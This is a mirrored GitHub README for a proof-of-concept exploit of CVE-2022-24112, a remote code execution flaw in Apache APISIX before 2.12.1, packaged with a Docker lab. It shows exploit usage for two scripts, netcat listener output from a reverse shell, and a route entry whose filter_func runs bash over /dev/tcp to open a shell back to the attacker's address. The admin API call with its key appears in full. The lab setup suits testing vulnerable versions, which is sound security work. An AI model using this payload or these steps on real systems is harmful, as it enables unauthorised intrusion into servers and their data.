Coder Social home page Coder Social logo

twseptian / cve-2022-24112 Goto Github PK

View Code? Open in Web Editor NEW
8.0 2.0 11.0 53 KB

Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab

Python 19.99% Makefile 24.90% Dockerfile 49.93% Shell 5.18%
cve-2022-24112 remote-code-execution apache-apisix proof-of-concept

cve-2022-24112's Introduction

Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab

Let's clone using gitclone this repository, then we can navigate to apisix-docker/examples. In this docker-compose.yml file, we already change into image: apache/apisix:2.12.0-alpine, because the vulnerability in this version, then let's install using docker compose.

QuickStart via docker-compose,we can start all modules with docker-compose.

$ cd example
$ docker-compose -p docker-apisix up -d

Let's use this command docker ps -a to make sure the docker images already runs in the background. after this is done, we can access the API with a simple curl

$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600

{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}
  • poc.py. exploit usage python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444
$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444

                                   .     ,                                                                          
        _.._ * __*\./ ___  _ \./._ | _ *-+-                                                                         
       (_][_)|_) |/'\     (/,/'\[_)|(_)| |                                                                          
          |                     |                                                                                   
                                                                                                                    
                (CVE-2022-24112)                                                                                    
{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }

reverse shell connection

$ nc -lvnp 4444                       
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 .
drwxr-xr-x    1 root     root          4096 Jan 28 09:06 ..
drwxr-xr-x   13 root     root          4096 Jan 28 09:07 apisix
drwx------    2 nobody   root          4096 Mar 20 15:48 client_body_temp
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 conf
drwxr-xr-x    5 root     root          4096 Jan 28 09:07 deps
drwx------    2 nobody   root          4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x    2 1000     1000          4096 Mar 20 15:48 logs
drwx------    2 nobody   root          4096 Mar 20 15:48 proxy_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 scgi_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 uwsgi_temp
  • poc2.py. exploit usage python3 poc2.py -h
$ python3 poc2.py -h                                        

    >> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
    >> by twseptian

usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT

Apache APISIX 2.12.1 - Remote Code Execution (RCE)

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET_IP, --rhost TARGET_IP
                        Target IP
  -p TARGET_PORT, --rport TARGET_PORT
                        Target Port
  -L LOCALHOST, --lhost LOCALHOST
                        Localhost/Local IP
  -P LOCALPORT, --lport LOCALPORT
                        Localport

exploit usage python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444

$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444

    >> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
    >> by twseptian

[!] Take RCE

listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 .
drwxr-xr-x    1 root     root          4096 Jan 28 09:06 ..
drwxr-xr-x   13 root     root          4096 Jan 28 09:07 apisix
drwx------    2 nobody   root          4096 Mar 20 15:48 client_body_temp
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 conf
drwxr-xr-x    5 root     root          4096 Jan 28 09:07 deps
drwx------    2 nobody   root          4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x    2 1000     1000          4096 Mar 20 15:48 logs
drwx------    2 nobody   root          4096 Mar 20 15:48 proxy_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 scgi_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 uwsgi_temp
$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
  "count": 1,
  "action": "get",
  "node": {
    "key": "/apisix/routes",
    "nodes": [
      {
        "modifiedIndex": 161,
        "value": {
          "priority": 0,
          "uri": "/rms/fzxewh",
          "status": 1,
          "upstream": {
            "hash_on": "vars",
            "pass_host": "pass",
            "nodes": {
              "schmidt-schaefer.com": 1
            },
            "type": "roundrobin",
            "scheme": "http"
          },
          "id": "index",
          "create_time": 1647791428,
          "filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
          "update_time": 1647799320,
          "name": "wthtzv"
        },
        "key": "/apisix/routes/index",
        "createdIndex": 16
      }
    ],
    "dir": true
  }
}

Credits

cve-2022-24112's People

Contributors

twseptian avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar

Forkers

hkzck wulinpin florin-diaconescu liansweb old-hansen highgerms agelovito amesianx frankyubo lixworth

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.